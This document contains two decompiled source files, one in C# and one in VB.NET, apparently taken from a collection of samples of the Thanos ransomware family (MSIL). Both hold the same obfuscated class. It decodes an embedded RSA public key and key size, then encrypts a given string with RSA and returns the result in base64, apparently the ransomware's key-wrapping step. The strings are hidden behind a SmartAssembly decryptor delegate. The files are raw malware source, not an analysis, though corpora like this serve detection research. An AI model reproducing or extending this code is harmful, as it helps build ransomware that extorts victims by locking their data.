File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2/frgoWklvEOSV/FlpXYRWvTX.cs
using System;
using System.Security.Cryptography;
using System.Text;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;

namespace frgoWklvEOSV;

public static class FlpXYRWvTX
{
	private static bool QHqhUxmYNLgFw;

	private static readonly string XLDTHwKdmajt;

	[NonSerialized]
	internal static GetString _008F;

	public static string ZTvekdOmyg(string P_0)
	{
		int OPfmSiyNGzFxTlOi = 0;
		string fPzbhtlmbDZXN = _008F(107388735);
		MkdigCRsEEMOX(XLDTHwKdmajt, out OPfmSiyNGzFxTlOi, out fPzbhtlmbDZXN);
		byte[] inArray = YEURKxvgnTup(Encoding.UTF8.GetBytes(P_0), OPfmSiyNGzFxTlOi, fPzbhtlmbDZXN);
		return Convert.ToBase64String(inArray);
	}

	private static byte[] YEURKxvgnTup(byte[] P_0, int P_1, string P_2)
	{
		if (P_0 == null || P_0.Length == 0)
		{
			throw new ArgumentException(_008F(107402583), _008F(107402562));
		}
		int num = NmEJfVQfRMcT(P_1);
		if (P_0.Length > num)
		{
			throw new ArgumentException(string.Format(_008F(107402553), num), _008F(107402562));
		}
		if (!KNJuZPxStl(P_1))
		{
			throw new ArgumentException(_008F(107402548), _008F(107402487));
		}
		if (string.IsNullOrEmpty(P_2))
		{
			throw new ArgumentException(_008F(107402506), _008F(107402477));
		}
		using RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(P_1);
		rSACryptoServiceProvider.FromXmlString(P_2);
		return rSACryptoServiceProvider.Encrypt(P_0, QHqhUxmYNLgFw);
	}

	private static int NmEJfVQfRMcT(int P_0)
	{
		if (QHqhUxmYNLgFw)
		{
			return (P_0 - 384) / 8 + 7;
		}
		return (P_0 - 384) / 8 + 37;
	}

	private static bool KNJuZPxStl(int P_0)
	{
		if (P_0 >= 384 && P_0 <= 16384)
		{
			return P_0 % 8 == 0;
		}
		return false;
	}

	private static void MkdigCRsEEMOX(string IZpTbvGgqiuQ, out int OPfmSiyNGzFxTlOi, out string fPzbhtlmbDZXN)
	{
		OPfmSiyNGzFxTlOi = 0;
		fPzbhtlmbDZXN = _008F(107388735);
		if (IZpTbvGgqiuQ == null || IZpTbvGgqiuQ.Length <= 0)
		{
			return;
		}
		byte[] bytes = Convert.FromBase64String(IZpTbvGgqiuQ);
		string @string = Encoding.UTF8.GetString(bytes);
		if (@string.Contains(_008F(107402428)))
		{
			string[] array = @string.Split(new char[1] { '!' }, 2);
			try
			{
				OPfmSiyNGzFxTlOi = int.Parse(array[0]);
				fPzbhtlmbDZXN = array[1];
			}
			catch (Exception)
			{
			}
		}
	}

	static FlpXYRWvTX()
	{
		Strings.CreateGetStringDelegate(typeof(FlpXYRWvTX));
		QHqhUxmYNLgFw = false;
		XLDTHwKdmajt = _008F(107402423);
	}
}

File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131/chaddad/frgoWklvEOSV/FlpXYRWvTX.vb
Imports System
Imports System.Security.Cryptography
Imports System.Text
Imports SmartAssembly.Delegates
Imports SmartAssembly.HouseOfCards

Namespace frgoWklvEOSV
	' Token: 0x02000015 RID: 21
	Public Module FlpXYRWvTX
		' Token: 0x06000067 RID: 103 RVA: 0x0000CA6C File Offset: 0x0000AC6C
		Public Function ZTvekdOmyg(string_0 As String) As String
			Dim num As Integer = 0
			Dim text As String = FlpXYRWvTX.getString_0(107388735)
			FlpXYRWvTX.MkdigCRsEEMOX(FlpXYRWvTX.XLDTHwKdmajt, num, text)
			Dim array As Byte() = FlpXYRWvTX.YEURKxvgnTup(Encoding.UTF8.GetBytes(string_0), num, text)
			Return Convert.ToBase64String(array)
		End Function

		' Token: 0x06000068 RID: 104 RVA: 0x0000CAB4 File Offset: 0x0000ACB4
		Private Function YEURKxvgnTup(byte_0 As Byte(), int_0 As Integer, string_0 As String) As Byte()
			If byte_0 IsNot Nothing AndAlso byte_0.Length <> 0 Then
				Dim num As Integer = FlpXYRWvTX.NmEJfVQfRMcT(int_0)
				If byte_0.Length > num Then
					Throw New ArgumentException(String.Format(FlpXYRWvTX.getString_0(107402553), num), FlpXYRWvTX.getString_0(107402562))
				End If
				If Not FlpXYRWvTX.KNJuZPxStl(int_0) Then
					Throw New ArgumentException(FlpXYRWvTX.getString_0(107402548), FlpXYRWvTX.getString_0(107402487))
				End If
				If String.IsNullOrEmpty(string_0) Then
					Throw New ArgumentException(FlpXYRWvTX.getString_0(107402506), FlpXYRWvTX.getString_0(107402477))
				End If
				Using rsacryptoServiceProvider As RSACryptoServiceProvider = New RSACryptoServiceProvider(int_0)
					rsacryptoServiceProvider.FromXmlString(string_0)
					Return rsacryptoServiceProvider.Encrypt(byte_0, FlpXYRWvTX.QHqhUxmYNLgFw)
				End Using
			End If
			Throw New ArgumentException(FlpXYRWvTX.getString_0(107402583), FlpXYRWvTX.getString_0(107402562))
		End Function

		' Token: 0x06000069 RID: 105 RVA: 0x00002908 File Offset: 0x00000B08
		Private Function NmEJfVQfRMcT(int_0 As Integer) As Integer
			If FlpXYRWvTX.QHqhUxmYNLgFw Then
				Return(int_0 - 384) / 8 + 7
			End If
			Return(int_0 - 384) / 8 + 37
		End Function

		' Token: 0x0600006A RID: 106 RVA: 0x00002929 File Offset: 0x00000B29
		Private Function KNJuZPxStl(int_0 As Integer) As Boolean
			Return int_0 >= 384 AndAlso int_0 <= 16384 AndAlso int_0 Mod 8 = 0
		End Function

		' Token: 0x0600006B RID: 107 RVA: 0x0000CBC0 File Offset: 0x0000ADC0
		Private Sub MkdigCRsEEMOX(IZpTbvGgqiuQ As String, <System.Runtime.InteropServices.OutAttribute()> ByRef OPfmSiyNGzFxTlOi As Integer, <System.Runtime.InteropServices.OutAttribute()> ByRef fPzbhtlmbDZXN As String)
			OPfmSiyNGzFxTlOi = 0
			fPzbhtlmbDZXN = FlpXYRWvTX.getString_0(107388735)
			If IZpTbvGgqiuQ IsNot Nothing AndAlso IZpTbvGgqiuQ.Length > 0 Then
				Dim array As Byte() = Convert.FromBase64String(IZpTbvGgqiuQ)
				Dim [string] As String = Encoding.UTF8.GetString(array)
				If [string].Contains(FlpXYRWvTX.getString_0(107402428)) Then
					Dim array2 As String() = [string].Split(New Char() { "!"c }, 2)
					Try
						OPfmSiyNGzFxTlOi = Integer.Parse(array2(0))
						fPzbhtlmbDZXN = array2(1)
					Catch ex As Exception
					End Try
				End If
			End If
		End Sub

		' Token: 0x0600006C RID: 108 RVA: 0x00002943 File Offset: 0x00000B43
		' Note: this type is marked as 'beforefieldinit'.
		Shared Sub New()
			Strings.CreateGetStringDelegate(GetType(FlpXYRWvTX))
			FlpXYRWvTX.QHqhUxmYNLgFw = False
			FlpXYRWvTX.XLDTHwKdmajt = FlpXYRWvTX.getString_0(107402423)
		End Sub

		' Token: 0x04000093 RID: 147
		Private QHqhUxmYNLgFw As Boolean

		' Token: 0x04000094 RID: 148
		Private XLDTHwKdmajt As String

		' Token: 0x04000095 RID: 149
		<NonSerialized()>
		Friend getString_0 As GetString
	End Module
End Namespace
